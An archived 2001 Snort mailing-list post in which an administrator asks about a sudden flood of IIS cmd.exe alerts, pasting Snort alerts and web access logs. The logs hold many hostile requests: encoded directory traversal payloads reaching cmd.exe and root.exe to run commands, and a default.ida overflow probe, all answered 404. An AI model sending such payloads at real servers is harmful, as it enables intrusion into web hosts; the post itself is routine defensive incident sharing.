Snort mailing list archives

Previous By Date Next
Previous By Thread Next

WEB-IIS Cmd attack

From: Togan Muftuoglu <toganm () users sourceforge net>
Date: Tue, 18 Sep 2001 17:34:12 +0300
Hi,

Suddenly there is flood of Web-IIS CM attacks this is just a tiny bit
of it, 

Is this a new variant or script kiddes around ?

TIA

Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:59:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.113.99:4917 -> 212.174.50.248:80


::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.147.6%134595336 - - [18/Sep/2001:16:50:59 +0300] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:55:58 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:00 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:01 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:05 +0300] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:06 +0300] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:08 +0300] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:10 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:11 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:17 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:23 +0300] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:24 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34 - - [18/Sep/2001:16:57:24 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:25 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:30 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:31 +0300] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:34 +0300] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:41 +0300] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:46 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:49 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 HTTP/1.0" 404 - "" ""

----- End forwarded message -----

-- 
Togan Muftuoglu


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: